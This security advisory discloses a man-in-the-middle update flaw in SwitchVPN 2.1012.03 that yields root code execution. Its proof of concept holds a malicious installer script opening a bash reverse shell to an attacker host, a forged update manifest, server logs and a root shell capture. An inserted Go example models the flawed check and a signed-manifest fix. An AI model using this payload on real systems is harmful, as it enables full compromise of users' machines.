SwitchVPN For MacOS / Windows 2.1012.03 Man-In-The-Middle

Posted Nov 14, 2018
Authored by Bernd Leitner

SwitchVPN for MacOS and Windows version 2.1012.03 suffers from a man-in-the-middle vulnerability.

tags | exploit
systems | windows
SHA-256 | bb38df2916279a67eae167360690706c54013599fd3e8810b088263a9fa9d6b4

=======================================================================
Title: Insecure Update Process and RCE
Product: SwitchVPN for MacOS, Windows
Vulnerable version: 2.1012.03
CVE ID: Requested
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-11-01
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under
threat. As experts in online security we believed we could solve this
problem. So we came together as a team to make SwitchVPN, a simple and
powerful app to keep the internet free. SwitchVPN is simple. Install it on
your phone, tablet or laptop, then just switch it on to keep the internet
free. SwitchVPN is powerful. Our exclusive VPN Service technology is
constantly being upgraded by a dedicated team of internet security experts."

Source: https://switchvpn.net/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker on
the same network can leverage the update process to install malware or
execute arbitrary code as root/administrator and fully compromise the system.

Users are urged to disable auto-updates and not to run the manual update
utility until the issue has been fixed.


Vulnerability overview/description:
-----------------------------------
Insecure Update Process

The update process in the SwitchVPN client is vulnerable to a MiTM
(man-in-the-middle) attack. The client either checks for the availability of
a new version using the integrated auto-update function, or the user can
manually initiate an update using an update utility. Version information is
pulled from a remote XML file (Updates.xml) and compared to the version number
of the currently installed SwitchVPN client.

All requests are transmitted over plain HTTP, which means that an attacker on
the same network is able to intercept and manipulate the traffic. The SHA-1
checksum that the client compares the downloaded archive against is delivered
in that same unauthenticated XML file, so it offers no protection against a
tampered package: the attacker simply supplies the hash of their own archive.

This means an attacker can trigger the SwitchVPN client to download a
malicious update package, which is then installed on the device. In addition,
an attacker is able to implant an installation script (installscript.qs)
which is executed immediately with elevated privileges. When auto-update is
enabled (which is the default setting), this process happens completely
transparently to the user.
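The following is an added example and not code from the advisory or from
SwitchVPN. It models the decision the client makes on the metadata it fetched,
using the Updates.xml field names the advisory shows (Name, Version, SHA1).
vulnerableAccepts reproduces the flawed logic: the SHA-1 the meta archive is
checked against arrives in the same plaintext response, so an attacker who
rewrites Updates.xml with a higher version and the hash of their own archive
passes the check. hardenedAccepts is one way to close the hole (an assumption
for illustration, not the vendor's fix): refuse non-HTTPS repository URLs and
verify an Ed25519 signature over the manifest bytes with a key pinned in the
client. The host updates.example, the in-memory "archive" bytes and the
runtime-generated vendor key are constructed placeholders.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha1"
	"encoding/hex"
	"encoding/xml"
	"errors"
	"fmt"
	"net/url"
	"strconv"
	"strings"
)

// PackageUpdate holds the Updates.xml fields the update decision depends on.
type PackageUpdate struct {
	Name    string `xml:"Name"`
	Version string `xml:"Version"`
	SHA1    string `xml:"SHA1"` // hash of <version>meta.7z, carried inside the manifest itself
}

// Fetch is everything one update check received; the legacy repo has no Signature.
type Fetch struct {
	URL         string
	Manifest    []byte // Updates.xml bytes exactly as received
	Signature   []byte // detached Ed25519 signature over Manifest (hardened repo only)
	MetaArchive []byte // <version>meta.7z as received; this is what carries installscript.qs
}

var (
	ErrPlaintext    = errors.New("update metadata must be fetched over TLS")
	ErrBadSignature = errors.New("manifest signature does not verify against pinned key")
)

// newerVersion compares dotted versions numerically field by field, so
// "2.999.03" is older than "2.1012.03" even though it sorts higher as text.
func newerVersion(candidate, installed string) bool {
	a, b := strings.Split(candidate, "."), strings.Split(installed, ".")
	for i := 0; i < len(a) && i < len(b); i++ {
		x, _ := strconv.Atoi(a[i])
		y, _ := strconv.Atoi(b[i])
		if x != y {
			return x > y
		}
	}
	return len(a) > len(b)
}

func sha1hex(b []byte) string { s := sha1.Sum(b); return hex.EncodeToString(s[:]) }

// selectUpdate returns the version to install ("" if nothing is newer) after
// checking the meta archive against the SHA1 the manifest carries.
func selectUpdate(manifest, meta []byte, installed string) (string, error) {
	var u struct {
		Packages []PackageUpdate `xml:"PackageUpdate"`
	}
	if err := xml.Unmarshal(manifest, &u); err != nil {
		return "", err
	}
	for _, p := range u.Packages {
		if !newerVersion(p.Version, installed) {
			continue
		}
		if !strings.EqualFold(p.SHA1, sha1hex(meta)) {
			return "", fmt.Errorf("%s: meta archive hash mismatch", p.Name)
		}
		return p.Version, nil
	}
	return "", nil
}

// vulnerableAccepts mirrors the flawed client: the SHA1 check passes for any
// attacker-built archive because manifest and archive share one HTTP channel.
func vulnerableAccepts(f Fetch, installed string) (string, error) {
	return selectUpdate(f.Manifest, f.MetaArchive, installed)
}

// hardenedAccepts refuses plaintext transport and requires the manifest to be
// signed by a key pinned in the client before any hash inside it is trusted.
func hardenedAccepts(f Fetch, installed string, pinned ed25519.PublicKey) (string, error) {
	if u, err := url.Parse(f.URL); err != nil || u.Scheme != "https" {
		return "", ErrPlaintext
	}
	if !ed25519.Verify(pinned, f.Manifest, f.Signature) {
		return "", ErrBadSignature
	}
	return selectUpdate(f.Manifest, f.MetaArchive, installed)
}

// buildManifest renders the advisory's Updates.xml shape with SHA1 bound to meta.
func buildManifest(version string, meta []byte) []byte {
	return []byte(fmt.Sprintf(`<Updates>
 <PackageUpdate>
  <Name>com.svpn.osx</Name>
  <Script>installscript.qs</Script>
  <Version>%s</Version>
  <ForcedInstallation>true</ForcedInstallation>
  <SHA1>%s</SHA1>
 </PackageUpdate>
</Updates>`, version, sha1hex(meta)))
}

// signedFetch is what a vendor-run repository would serve: HTTPS plus a detached
// signature over the exact manifest bytes. updates.example is a placeholder host.
func signedFetch(priv ed25519.PrivateKey, version string, meta []byte) Fetch {
	m := buildManifest(version, meta)
	return Fetch{URL: "https://updates.example/updates/osx/repo/Updates.xml",
		Manifest: m, Signature: ed25519.Sign(priv, m), MetaArchive: meta}
}

func main() {
	installed := "2.1012.03"
	meta := []byte("constructed stand-in for 2.6666.03meta.7z") // a real one would hold installscript.qs
	attacker := Fetch{URL: "http://updates.example/updates/osx/repo/Updates.xml",
		Manifest: buildManifest("2.6666.03", meta), MetaArchive: meta}
	pub, priv, _ := ed25519.GenerateKey(rand.Reader) // stands in for the vendor key pinned in the client
	fmt.Println(vulnerableAccepts(attacker, installed))                                 // 2.6666.03 <nil>
	fmt.Println(hardenedAccepts(attacker, installed, pub))                              // rejected: ErrPlaintext
	fmt.Println(hardenedAccepts(signedFetch(priv, "2.1013.00", meta), installed, pub)) // 2.1013.00 <nil>
}
```

A signed manifest stops the forged-version attack shown in this advisory, but
on its own it does not stop an attacker from replaying an older, genuinely
signed manifest; a production updater also needs freshness or anti-rollback
checks on the signed metadata.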


Proof of concept
-----------------

In order to demonstrate the issue, a PoC for spawning a remote shell on MacOS
is presented. A demonstration video can be (temporarily) downloaded from:
https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov

NOTE: Delivering a malicious payload through the main update package can be
set up the same way:

1) Prepare malicious installscript.qs:
============================================================================================
...
Component.prototype.createOperations = function()
{
    component.createOperations();

    // Write a reverse-shell script to /tmp (attacker listener at 192.168.1.2:9999)
    installer.execute("touch", "/tmp/pwn.sh");
    installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/192.168.1.2/9999 0>&1" >> /tmp/pwn.sh'));
    installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh"));
    // Queued as an elevated operation, so the installer runs it as root
    component.addElevatedOperation("Execute", "/tmp/pwn.sh");

    installer.installationFinished.connect(this, Component.prototype.installationFinishedPageIsShown);
}
Component.prototype.installationFinishedPageIsShown = function()
{
    console.log("Component.prototype.installationFinishedPageIsShown\n\n");
}
...
============================================================================================

2) Store "installscript.qs" in folder "com.svpn.osx" and compress it to "2.6666.03meta.7z":
============================================================================================
mb:~ b$ shasum 2.6666.03meta.7z
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f 2.6666.03meta.7z
============================================================================================

3) Prepare "Updates.xml" which will be delivered to the SwitchVPN client:
============================================================================================
<Updates>
 <ApplicationName>{AnyApplication}</ApplicationName>
 <ApplicationVersion>1.0.0</ApplicationVersion>
 <Checksum>true</Checksum>
 <PackageUpdate>
  <Name>com.svpn.osx</Name>
  <DisplayName>Switch VPN</DisplayName>
  <Description>Switch VPN</Description>
  <Script>installscript.qs</Script>
  <Version>2.6666.03</Version> <!-- new (high) version number to trigger the update -->
  <ReleaseDate>2017-10-12</ReleaseDate>
  <Default>true</Default>
  <ForcedInstallation>true</ForcedInstallation>
  <RequiresAdminRights>true</RequiresAdminRights>
  <UpdateFile CompressedSize="12805545" OS="Any" UncompressedSize="33330707"/>
  <DownloadableArchives>SwitchVPN.app.7z</DownloadableArchives>
  <SHA1>20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f</SHA1> <!-- SHA-1 hash of 2.6666.03meta.7z -->
 </PackageUpdate>
</Updates>
============================================================================================

4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...)
============================================================================================
NOTE: Setting up a MiTM environment won't be discussed in this advisory.

Create the following folder structure on the malicious web-server:
/updates/osx/repo/com.svpn.osx

Store Updates.xml to:
/updates/osx/repo/Updates.xml

Store the malicious update data to:
/updates/osx/repo/com.svpn.osx/
-rw-r--r--@ 1 b staff 12805505 Nov 1 14:37 2.6666.03SwitchVPN.app.7z
-rw-r--r--@ 1 b staff       40 Nov 1 14:37 2.6666.03SwitchVPN.app.7z.sha1
-rw-r--r--@ 1 b staff      526 Nov 1 20:36 2.6666.03meta.7z   <----- contains malicious "installscript.qs"
============================================================================================

5) Start SwitchVPN client or run the manual update utility:
============================================================================================
# Requests are successfully redirected to our web-server

Serving HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET /updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -
...
============================================================================================

6) Receive reverse shell:
============================================================================================
# Start netcat listener before starting SwitchVPN client

mb:~ b$ nc -l 9999

bash: no job control in this shell
bash-3.2# whoami
root
============================================================================================

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well. Both the Windows and MacOS
versions are vulnerable.


Vendor contact timeline:
------------------------
2018-11-01: Contacted vendor through management@switchvpn.net
2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net
2018-11-11: Requested update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018

